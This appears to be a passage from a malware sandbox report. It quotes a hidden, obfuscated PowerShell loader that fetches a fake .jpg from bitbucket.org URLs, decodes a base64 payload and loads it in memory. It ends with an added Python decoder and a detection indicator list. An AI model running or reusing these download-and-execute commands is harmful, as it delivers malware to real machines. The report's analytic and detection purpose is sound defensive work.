#bgB0#C4#R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#K##k#Gw#aQBu#Gs#KQ#g#H0#I#Bj#GE#d#Bj#Gg#I#B7#C##YwBv#G4#d#Bp#G4#dQBl#C##fQ#g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I#By#GU#d#B1#HI#bg#g#CQ#bgB1#Gw#b##g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#Gw#aQBu#Gs#cw#g#D0#I#B##Cg#JwBo#HQ#d#Bw#HM#Og#v#C8#YgBp#HQ#YgB1#GM#awBl#HQ#LgBv#HI#Zw#v#Gg#ZwBk#GY#a#Bk#GY#ZwBk#C8#d#Bl#HM#d##v#GQ#bwB3#G4#b#Bv#GE#Z#Bz#C8#bgBl#Hc#XwBp#G0#YQBn#GU#Mg#u#Go#c#Bn#D8#MQ#0#DQ#Ng#x#Dc#Mg#x#Cc#L##g#Cc#a#B0#HQ#c#Bz#Do#Lw#v#GI#aQB0#GI#dQBj#Gs#ZQB0#C4#bwBy#Gc#LwBo#Gc#Z#Bm#Gg#Z#Bm#Gc#Z##v#HQ#ZQBz#HQ#LwBk#G8#dwBu#Gw#bwBh#GQ#cw#v#G4#ZQB3#F8#aQBt#GE#ZwBl#C4#agBw#Gc#Pw#x#DQ#N##0#DE#Nw#y#DM#Jw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bp#G0#YQBn#GU#QgB5#HQ#ZQBz#C##PQ#g#EQ#bwB3#G4#b#Bv#GE#Z#BE#GE#d#Bh#EY#cgBv#G0#T#Bp#G4#awBz#C##J#Bs#Gk#bgBr#HM#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I#Bp#GY#I##o#CQ#aQBt#GE#ZwBl#EI#eQB0#GU#cw#g#C0#bgBl#C##J#B
u#HU#b#Bs#Ck#I#B7#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#V#Bl#Hg#d##u#EU#bgBj#G8#Z#Bp#G4#ZwBd#Do#OgBV#FQ#Rg#4#C4#RwBl#HQ#UwB0#HI#aQBu#Gc#K##k#Gk#bQBh#Gc#ZQBC#Hk#d#Bl#HM#KQ#7##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBT#FQ#QQBS#FQ#Pg#+#Cc#Ow#g#CQ#ZQBu#GQ#RgBs#GE#Zw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#EU#TgBE#D4#Pg#n#Ds#I##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##9#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##u#Ek#bgBk#GU#e#BP#GY#K##k#HM#d#Bh#HI#d#BG#Gw#YQBn#Ck#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#GU#bgBk#Ek#bgBk#GU#e##g#D0#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#ZQBu#GQ#RgBs#GE#Zw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##aQBm#C##K##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##t#Gc#ZQ#g#D##I##t#GE#bgBk#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##t#Gc#d##g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##p#C##ew#g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#Cs#PQ#g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#LgBM#GU#bgBn#HQ#a##7#C##DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#CQ#YgBh#HM#ZQ#2#DQ#T#Bl#G4#ZwB0#Gg#I##9#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##t#C##J#Bz#HQ#YQ
        Source: Process startedAuthor: frack113: Data: Command: powershell "$codigo = 'WwBO#GU#d##u#FM#ZQBy#HY#aQBj#GU#U#Bv#Gk#bgB0#E0#YQBu#GE#ZwBl#HI#XQ#6#Do#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b##g#D0#I#Bb#E4#ZQB0#C4#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b#BU#Hk#c#Bl#F0#Og#6#FQ#b#Bz#DE#Mg#N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgB1#G4#YwB0#Gk#bwBu#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I#B7#C##c#Bh#HI#YQBt#C##K#Bb#HM#d#By#Gk#bgBn#Fs#XQBd#CQ#b#Bp#G4#awBz#Ck#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#B3#GU#YgBD#Gw#aQBl#G4#d##g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#C##PQ#g#Ec#ZQB0#C0#UgBh#G4#Z#Bv#G0#I##t#Ek#bgBw#HU#d#BP#GI#agBl#GM#d##g#CQ#b#Bp#G4#awBz#C##LQBD#G8#dQBu#HQ#I##k#Gw#aQBu#Gs#cw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgBv#HI#ZQBh#GM#a##g#Cg#J#Bs#Gk#bgBr#C##aQBu#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#Ck#I#B7#C##d#By#Hk#I#B7#C##cgBl#HQ#dQBy#G4#I##k#Hc#ZQBi#EM#b#Bp#GU#bgB0#C4#R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#K##k#Gw#aQBu#Gs#KQ#g#H0#I#Bj#GE#d#Bj#Gg#I#B7#C##YwBv#G4#d#Bp#G4#dQBl#C##fQ#g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I#By#GU#d#B1#HI#bg#g#CQ#bgB1#Gw#b##g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#Gw#aQBu#Gs#cw#g#D0#I#B##Cg#JwBo#HQ#d#Bw#HM#Og#v#C8#YgBp#HQ#YgB1#GM#awBl#HQ#LgBv#HI#Zw#v#Gg#ZwBk#GY#a#Bk#GY#ZwBk#C8#d#Bl#HM#d##v#GQ#bwB3#G4#b#Bv#GE#Z#Bz#C8#bgBl#Hc#XwBp#G0#YQBn#GU#Mg#u#Go#c#Bn#D8#MQ#0#DQ#Ng#x#Dc#Mg#x#Cc#L##g#Cc#a#B0#HQ#c#Bz#Do#Lw#v#GI#aQB0#GI#dQBj#Gs#ZQB0#C4#bwBy#Gc#LwBo#Gc#Z#Bm#Gg#Z#Bm#Gc#Z##v#HQ#ZQBz#HQ#LwBk#G8#dwBu#Gw#bwBh#GQ#cw#v#G4#ZQB3#F8#aQBt#GE#ZwBl#C4#agBw#Gc#Pw#x#DQ#N##0#DE#Nw#y#DM#Jw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bp#G0#YQBn#GU#QgB5#HQ#ZQBz#C##PQ#g#EQ#bwB3#G4#b#Bv#GE#Z#BE#GE#d#Bh#EY#cgBv#G0#T#Bp#G4#awBz#C##J#Bs#Gk#bgBr#HM#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I#Bp#GY#I##o#CQ#aQBt#GE#ZwBl#EI#eQB0#GU#cw#g#C0#bgBl#C##J#Bu#HU#b#Bs#Ck#I#B7#C##J
#Bp#G0#YQBn#GU#V#Bl#Hg#d##g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#V#Bl#Hg#d##u#EU#bgBj#G8#Z#Bp#G4#ZwBd#Do#OgBV#FQ#Rg#4#C4#RwBl#HQ#UwB0#HI#aQBu#Gc#K##k#Gk#bQBh#Gc#ZQBC#Hk#d#Bl#HM#KQ#7##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBT#FQ#QQBS#FQ#Pg#+#Cc#Ow#g#CQ#ZQBu#GQ#RgBs#GE#Zw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#EU#TgBE#D4#Pg#n#Ds#I##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##9#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##u#Ek#bgBk#GU#e#BP#GY#K##k#HM#d#Bh#HI#d#BG#Gw#YQBn#Ck#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#GU#bgBk#Ek#bgBk#GU#e##g#D0#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#ZQBu#GQ#RgBs#GE#Zw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##aQBm#C##K##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##t#Gc#ZQ#g#D##I##t#GE#bgBk#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##t#Gc#d##g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##p#C##ew#g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#Cs#PQ#g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#LgBM#GU#bgBn#HQ#a##7#C##DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#CQ#YgBh#HM#ZQ#2#DQ#T#Bl#G4#ZwB0#Gg#I##9#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##t#C##J#Bz#HQ#YQ
        Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\0XVZC3kfwL.exe, ProcessId: 3832, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0
        Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/hgdfhdfgd/test/downloads/new_image2.jpg?14461721', 'https://bitbucket.org/hgdfhdfgd/test/downloads/new_image.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] ('txt.orFAmco/sdaolnwod/rgfd/wgds/gro.tekcubtib//:sptth', '0', 'StartupName', 'RegAsm', '0'))}}", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in 
$shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/hgdfhdfgd/test/downloads/new_image2.jpg?14461721', 'https://bitbucket.org/hgdfhdfgd/test/downloads/new_image.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes
        Source: Process started; Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger; Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/hgdfhdfgd/test/downloads/new_image2.jpg?14461721', 'https://bitbucket.org/hgdfhdfgd/test/downloads/new_image.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] ('txt.orFAmco/sdaolnwod/rgfd/wgds/gro.tekcubtib//:sptth', '0', 'StartupName', 'RegAsm', '0'))}}", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/hgdfhdfgd/test/downloads/new_image2.jpg?14461721', 'https://bitbucket.org/hgdfhdfgd/test/downloads/new_image.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes
        Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell "$codigo = 'WwBO#GU#d##u#FM#ZQBy#HY#aQBj#GU#U#Bv#Gk#bgB0#E0#YQBu#GE#ZwBl#HI#XQ#6#Do#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b##g#D0#I#Bb#E4#ZQB0#C4#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b#BU#Hk#c#Bl#F0#Og#6#FQ#b#Bz#DE#Mg#N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgB1#G4#YwB0#Gk#bwBu#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I#B7#C##c#Bh#HI#YQBt#C##K#Bb#HM#d#By#Gk#bgBn#Fs#XQBd#CQ#b#Bp#G4#awBz#Ck#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#B3#GU#YgBD#Gw#aQBl#G4#d##g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#C##PQ#g#Ec#ZQB0#C0#UgBh#G4#Z#Bv#G0#I##t#Ek#bgBw#HU#d#BP#GI#agBl#GM#d##g#CQ#b#Bp#G4#awBz#C##LQBD#G8#dQBu#HQ#I##k#Gw#aQBu#Gs#cw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgBv#HI#ZQBh#GM#a##g#Cg#J#Bs#Gk#bgBr#C##aQBu#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#Ck#I#B7#C##d#By#Hk#I#B7#C##cgBl#HQ#dQBy#G4#I##k#Hc#ZQBi#EM#b#Bp#GU#bgB0#C4#R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#K##k#Gw#aQBu#Gs#KQ#g#H0#I#Bj#GE#d#Bj#Gg#I#B7#C##YwBv#G4#d#Bp#G4#dQBl#C##fQ#g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I#By#GU#d#B1#HI#bg#g#CQ#bgB1#Gw#b##g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#Gw#aQBu#Gs#cw#g#D0#I#B##Cg#JwBo#HQ#d#Bw#HM#Og#v#C8#YgBp#HQ#YgB1#GM#awBl#HQ#LgBv#HI#Zw#v#Gg#ZwBk#GY#a#Bk#GY#ZwBk#C8#d#Bl#HM#d##v#GQ#bwB3#G4#b#Bv#GE#Z#Bz#C8#bgBl#Hc#XwBp#G0#YQBn#GU#Mg#u#Go#c#Bn#D8#MQ#0#DQ#Ng#x#Dc#Mg#x#Cc#L##g#Cc#a#B0#HQ#c#Bz#Do#Lw#v#GI#aQB0#GI#dQBj#Gs#ZQB0#C4#bwBy#Gc#LwBo#Gc#Z#Bm#Gg#Z#Bm#Gc#Z##v#HQ#ZQBz#HQ#LwBk#G8#dwBu#Gw#bwBh#GQ#cw#v#G4#ZQB3#F8#aQBt#GE#ZwBl#C4#agBw#Gc#Pw#x#DQ#N##0#DE#Nw#y#DM#Jw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bp#G0#YQBn#GU#QgB5#HQ#ZQBz#C##PQ#g#EQ#bwB3#G4#b#Bv#GE#Z#BE#GE#d#Bh#EY#cgBv#G0#T#Bp#G4#awBz#C##J#Bs#Gk#bgBr#HM#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I#Bp#GY#I##o#CQ#aQBt#
GE#ZwBl#EI#eQB0#GU#cw#g#C0#bgBl#C##J#Bu#HU#b#Bs#Ck#I#B7#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#V#Bl#Hg#d##u#EU#bgBj#G8#Z#Bp#G4#ZwBd#Do#OgBV#FQ#Rg#4#C4#RwBl#HQ#UwB0#HI#aQBu#Gc#K##k#Gk#bQBh#Gc#ZQBC#Hk#d#Bl#HM#KQ#7##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBT#FQ#QQBS#FQ#Pg#+#Cc#Ow#g#CQ#ZQBu#GQ#RgBs#GE#Zw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#EU#TgBE#D4#Pg#n#Ds#I##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##9#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##u#Ek#bgBk#GU#e#BP#GY#K##k#HM#d#Bh#HI#d#BG#Gw#YQBn#Ck#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#GU#bgBk#Ek#bgBk#GU#e##g#D0#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#ZQBu#GQ#RgBs#GE#Zw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##aQBm#C##K##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##t#Gc#ZQ#g#D##I##t#GE#bgBk#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##t#Gc#d##g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##p#C##ew#g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#Cs#PQ#g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#LgBM#GU#bgBn#HQ#a##7#C##DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#CQ#YgBh#HM#ZQ#2#DQ#T#Bl#G4#ZwB0#Gg#I##9#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##t#C##J#Bz#HQ#YQ

        Data Obfuscation

        barindex
        Source: Process started; Author: Joe Security; Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/hgdfhdfgd/test/downloads/new_image2.jpg?14461721', 'https://bitbucket.org/hgdfhdfgd/test/downloads/new_image.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] ('txt.orFAmco/sdaolnwod/rgfd/wgds/gro.tekcubtib//:sptth', '0', 'StartupName', 'RegAsm', '0'))}}", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/hgdfhdfgd/test/downloads/new_image2.jpg?14461721', 'https://bitbucket.org/hgdfhdfgd/test/downloads/new_image.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes
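The loader quoted in the Sigma hits above is small enough to take apart by hand, and its three tricks (a '#'-for-'A' substitution over UTF-16LE base64 in the $codigo blob, a next-stage URL passed backwards, and a base64 payload hidden between <<BASE64_START>>/<<BASE64_END>> markers inside a file served as a .jpg) are worth having as working code. The Python below is an added example, not code from the sample, from Joe Sandbox or from the Sigma rules listed. The "image" container and the stage bytes inside it are constructed placeholders (both Bitbucket URLs returned 404 during this run, so the real second stage is not in this report), the indicator list is a simplified illustration of what the listed rules look for rather than their actual logic, and the blob decoder goes a little beyond the page by coping with the truncated copy of $codigo shown above.

```python
"""Decoder for the staged PowerShell loader in this report.

Added example, not code from the sample, Joe Sandbox or the Sigma rules.
Constructed inputs are marked as such below.
"""
import base64
import re
from typing import List, Optional

# First 72 characters of the $codigo blob quoted in the report. '#' stands in
# for 'A'; base64 never contains '#', so the substitution is unambiguous.
CODIGO_PREFIX = "WwBO#GU#d##u#FM#ZQBy#HY#aQBj#GU#U#Bv#Gk#bgB0#E0#YQBu#GE#ZwBl#HI#XQ#6#Do#"

# First argument handed to testpowershell.Home.la(), as quoted in the report.
REVERSED_ARG = "txt.orFAmco/sdaolnwod/rgfd/wgds/gro.tekcubtib//:sptth"

START_FLAG = b"<<BASE64_START>>"
END_FLAG = b"<<BASE64_END>>"


def decode_codigo(blob: str) -> str:
    """Undo the '#' substitution, base64-decode, then decode UTF-16LE.

    UTF-16LE is what -EncodedCommand and [Text.Encoding]::Unicode use, which
    is why every second base64 group in the blob encodes a 0x00 byte. The
    page's copy of the blob is cut off, so a dangling partial group is dropped
    and missing '=' padding is restored before decoding.
    """
    b64 = blob.replace("#", "A")
    rem = len(b64) % 4
    if rem == 1:  # a lone trailing sextet cannot form a whole byte
        b64 = b64[:-1]
    elif rem:
        b64 += "=" * (4 - rem)
    return base64.b64decode(b64).decode("utf-16-le", errors="replace")


def unreverse(arg: str) -> str:
    """The sample passes its next-stage URL backwards; reverse it."""
    return arg[::-1]


def extract_stage(container: bytes) -> Optional[bytes]:
    """Mirror the loader's marker search on the downloaded file.

    Returns the decoded bytes between the flags (what the loader hands to
    [System.Reflection.Assembly]::Load), or None when the markers are missing
    or out of order, which is exactly when the loader silently does nothing.
    """
    start = container.find(START_FLAG)
    end = container.find(END_FLAG)
    if start < 0 or end <= start:
        return None
    start += len(START_FLAG)
    # [Convert]::FromBase64String skips whitespace; validate=False does too.
    return base64.b64decode(container[start:end], validate=False)


# Constructed stand-in for new_image.jpg: a JPEG-looking header, the flagged
# payload, trailing junk. FAKE_STAGE is a placeholder, not a real assembly.
FAKE_STAGE = b"MZ placeholder - not a real .NET assembly"
CONSTRUCTED_JPG = (
    b"\xff\xd8\xff\xe0\x00\x10JFIF\x00\x01 junk "
    + START_FLAG + base64.b64encode(FAKE_STAGE) + END_FLAG
    + b" trailing junk"
)

# Excerpt of the launched command line as recorded in the report.
COMMAND_LINE = (
    '"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" '
    '-windowstyle hidden -executionpolicy bypass -Noprofile -command '
    '"... $commandBytes = [System.Convert]::FromBase64String($base64Command); '
    '$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); '
    "$type = $loadedAssembly.GetType('testpowershell.Home'); "
    "$method = $type.GetMethod('la').Invoke($null, [object[]] "
    "('txt.orFAmco/sdaolnwod/rgfd/wgds/gro.tekcubtib//:sptth', '0', "
    "'StartupName', 'RegAsm', '0'))}}\""
)

# Substrings the Sigma rules listed in this report key on. Constructed,
# simplified list for illustration, not the rules' actual detection logic.
INDICATORS = {
    "execution policy bypass": re.compile(r"-executionpolicy\s+bypass", re.I),
    "hidden window": re.compile(r"-windowstyle\s+hidden", re.I),
    "base64 decode": re.compile(r"FromBase64String", re.I),
    "in-memory assembly load": re.compile(r"\[System\.Reflection\.Assembly\]::Load", re.I),
    "reversed URL literal": re.compile(r"//:s?ptth"),
}


def scan_command_line(cmd: str) -> List[str]:
    """Return the names of the indicators present in a process command line."""
    return [name for name, rx in INDICATORS.items() if rx.search(cmd)]


if __name__ == "__main__":
    print(decode_codigo(CODIGO_PREFIX))
    print(unreverse(REVERSED_ARG))
    print(extract_stage(CONSTRUCTED_JPG))
    print(scan_command_line(COMMAND_LINE))
```

Run as a script it prints the decoded blob prefix ("[Net.ServicePointManager]::"), the recovered URL, the extracted placeholder stage and the indicator names. The reversed argument decodes to a third bitbucket.org download URL, in a different repository path from the two in $links; no request for it appears in the traffic section, consistent with the two 404s stopping the chain before the assembly was ever loaded.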
